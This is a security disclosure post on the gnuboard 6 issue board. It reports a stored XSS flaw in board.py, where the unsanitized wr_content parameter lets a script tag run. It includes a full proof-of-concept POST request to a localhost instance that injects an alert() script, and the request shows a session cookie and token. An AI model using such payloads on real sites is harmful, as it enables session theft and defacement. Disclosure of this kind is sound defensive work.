Stored XSS vulnerability using <script> tag when writing post > 그누보드6 이슈

그누보드6 이슈

좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.

Stored XSS vulnerability using <script> tag when writing post 정보

Stored XSS vulnerability using <script> tag when writing post

본문

Hello.

Currently, there is a writing vulnerability using the

[Name of affected Product]

gnuboard 6

[Affected version]

https://github.com/gnuboard/g6/commit/f5dd7b84c4bc943c53c3f8b7096de508ae2e7c38

[Vulnerability Type]

  • Stored XSS

[Affected Component]

board.py, All of posts

[Root Cause]

  • While writing reply on a post, wr_content parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.

[Attack Vectors]

https://github.com/gnuboard/g6/assets/25397908/1eb09079-f94e-4034-842a-b50a1ae32baa

As shown in the video above, the wr_content web parameter can be arbitrarily modified using HTML tags when writing, and when the <script> tag is inserted, a Stored XSS attack is normally possible.

It seems necessary to check and modify the script tag directly within the write_update function in board.py or to process HTML escaping.

The below is the PoC Web request.

POST /board/write_update/free? HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 1792
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySgFBdm7sWhgsJGVH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/write/free
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogIjhkNzgyMWMwZGI5MzUzZjg4MWFkOTRkZDVmZjJiYzhkIn0=.ZahUdQ.BiPBCxMiQMixJW06yEnmBeE4zGw
Connection: close

------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="uid"

2024011717272327
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_id"


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="parent_id"


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="token"

8d7821c0db9353f881ad94dd5ff2bc8d
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_name"

test
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_password"

tes
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_email"

*** 개인정보보호를 위한 이메일주소 노출방지 ***
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_homepage"

tetest
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="html"

html1
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_subject"

set
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_content"

<p>settt</p><script>alert(1)</script>

------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="option"

html2
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link1"


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link2"


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySgFBdm7sWhgsJGVH--
추천
0
  • 복사

댓글 3개

90레벨 이상 댓글을 남길 수 있습니다.

목록
문의 PC 버전
© SIRSOFT
현재 페이지 제일 처음으로